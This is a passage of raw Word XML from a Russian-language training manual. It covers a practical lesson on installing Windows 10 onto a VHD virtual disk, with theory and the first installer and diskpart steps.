        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:bCs/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Рис. 19. Завершение установки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="main"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="138" w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Теперь у звукового редактора Audacity появилась возможность сохранять готовые звуковые композиции в формате MP3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc26278724"/>
      <w:bookmarkStart w:id="90" w:name="_Toc507788242"/>
      <w:bookmarkStart w:id="91" w:name="_Toc507788517"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № </w:t>
      </w:r>
      <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Решение проблем сбоя установки ОС</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
      <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> научиться устанавливать ОС на виртуальный жесткий диск VHD. Загрузка Windows 10 с VHD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">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D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся рекомендации по установке и примерный текст консультации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание: Установка Windows 10 на виртуальный жесткий диск VHD. Загрузка Windows 10 с VHD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Одним из способов </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>протестировать другую версию Windows без переустановки существующей системы</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> является установка новой системы на </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>виртуальный жесткий диск</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> – файл формата </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>VHD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, виртуальный аналог физического жесткого диска, размещающийся на нем же самом, но имитирующий собственную дисковую структуру. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VHD-диск, другой раздел диска и виртуальная машина: в чем разница?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:right="57" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Полноценная работа с операционными системами, в частности, с последними версиями Windows – 7, 8.1, 10, на виртуальных машинах возможна только при наличии производительного компьютера. Плюс к этому, необходимо понимать, что программы-гипервизоры типа </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>VMware Workstation</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> – это не очередной загрузчик видео с YouTube, и в функционале таких программ прежде нужно еще разобраться. Тогда как для установки ОС на другой раздел диска или на VHD-диск особых вычислительных мощностей не нужно. Операционные системы не будут работать одна внутри другой, и каждая из них, функционируя в отдельности, сможет использовать ресурсы компьютера по полной. Да и нагрузка на человеческий мозг ограничивается лишь особенностями выбора места в процессе установки второй системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:right="57" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Установка Windows на другой раздел диска немногим отличается от установки на виртуальный VHD-диск. И в первом, и во втором случае установленная система будет занимать ровно столько места на диске, сколько ей понадобится. Тогда как, например, виртуальные машины VMware Workstation с определенным объемом виртуального пространства по факту на жестком диске физического компьютера занимают места почти вдвое меньше. Принципиального отличия нет и в процессе удаления Windows, установленной на другом разделе и на виртуальном VHD-диске. В обоих случаях нужно Windows удалить из меню загрузки в разделе конфигурации системы, затем уничтожить сами файлы. VHD-файл удаляется кнопкой </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="outset" w:sz="12" w:space="0" w:color="FFFFFF" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        </w:rPr>
        <w:t>Delete</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>, как и любой иной файл, раздел диска же форматируется.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В чем выгоды установки операционной системы на VHD-диск?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:right="57" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>По сути, в сравнении с установкой Windows на другой раздел диска у установки системы на виртуальный VHD-диск есть только два преимущества, и то второе таковым можно считать весьма условно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:right="57" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t xml:space="preserve">Первое преимущество </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>– это то, что не надо выделять отдельный раздел диска для новой системы, т.к. файл VHD можно создать на любом из существующих разделов, в любой из папок, и новая операционная система будет там себе аккуратненько размещаться.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:right="57" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Второе преимущество </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(весьма условное)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">– это возможность перемещения VHD-файла без вреда для установленной операционной системы. VHD-файл с установленной Windows можно впоследствии перемещать на другие разделы, другие жесткие диски </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(включая внешние)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">, другие компьютерные устройства. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:i w:val="0"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Преимущество условное, потому что</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> после перемещения VHD-файла загрузчик, естественно, самостоятельно не сможет определить место перемещения операционной системы. Равно как и не сможет увидеть новую систему загрузчик другого компьютера, если на него вдруг взять и поместить VHD-файл с Windows. Понадобится редактирование загрузчика.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidR="00A45B4F" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установить Windows 10 на виртуальный жесткий диск VHD. Загрузить Windows 10 с VHD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Для установки Windows 7 и 8.1 на VHD-диск понадобится точно такой же DVD-диск или загрузочная флешка с дистрибутивом системы, что и для обычной установки. Единственное условие – это не должна быть сборка с урезанным системным функционалом. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:u w:val="single"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Желательно использовать чистые системные образы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Загружаемся со съемного носителя и в приветственном окне установщика системы жмем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Далее</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</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706400" cy="1245600"/>
            <wp:effectExtent l="19050" t="0" r="8100" b="0"/>
            <wp:docPr id="27734" name="Рисунок 1" descr="Система">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истема">
                      <a:hlinkClick r:id="rId127"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId128" cstate="print">
                      <a:lum bright="20000"/>
                    </a:blip>
                    <a:srcRect l="11114" t="12000" r="9918" b="11111"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1706400" cy="1245600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0083647E" w:rsidRPr="00617AC0">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0083647E" w:rsidRPr="00617AC0">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0083647E" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1761265" cy="1281600"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27235" name="Рисунок 2" descr="Установка системы">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становка системы">
                      <a:hlinkClick r:id="rId129"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId130" cstate="print">
                      <a:lum bright="20000"/>
                    </a:blip>
                    <a:srcRect l="10527" t="11739" r="9961" b="10870"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1761265" cy="1281600"/>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Выбираем установку системы.</w:t>
      </w:r>
      <w:r w:rsidR="0083647E" w:rsidRPr="00617AC0">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0083647E" w:rsidRPr="00617AC0">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">При выборе типа установки жмем </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:u w:val="single"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>полную</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</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944000" cy="1497600"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27736" name="Рисунок 3" descr="Жмём полную">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Жмём полную">
                      <a:hlinkClick r:id="rId131"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId132" cstate="print"/>
                    <a:srcRect l="9331" r="7671" b="14746"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1944000" cy="1497600"/>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 xml:space="preserve">Попадаем в меню выбора разделов диска для устанавливаемой системы. Нам нужна </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:u w:val="single"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>командная строка</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">, с помощью которой мы и проведем необходимые операции для создания и отображения </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:i/>
          <w:iCs/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>VHD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">-диска в числе прочих разделов компьютера. Жмем клавиши </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="outset" w:sz="12" w:space="0" w:color="FFFFFF" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        </w:rPr>
        <w:t>Shift</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="outset" w:sz="12" w:space="0" w:color="FFFFFF" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        </w:rPr>
        <w:t>F10</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> для ее вызова.</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838550" cy="1418400"/>
            <wp:effectExtent l="19050" t="0" r="9300" b="0"/>
            <wp:docPr id="27737" name="Рисунок 4" descr="Командная строка">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мандная строка">
                      <a:hlinkClick r:id="rId133"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId134" cstate="print"/>
                    <a:srcRect l="9387" t="2881" r="11571" b="16049"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1838550" cy="1418400"/>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 xml:space="preserve">В среде командной строки – независимо от того, это установочный диск Windows 7, 8.1 или 10 – переключение на англоязычную раскладку осуществляется клавишами </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="outset" w:sz="12" w:space="0" w:color="FFFFFF" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        </w:rPr>
        <w:t>Shift</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="outset" w:sz="12" w:space="0" w:color="FFFFFF" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        </w:rPr>
        <w:t>Alt</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Последовательность вводимых в нашем случае команд будет таковой:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="outset" w:sz="12" w:space="0" w:color="FFFFFF" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>diskpart</w:t>
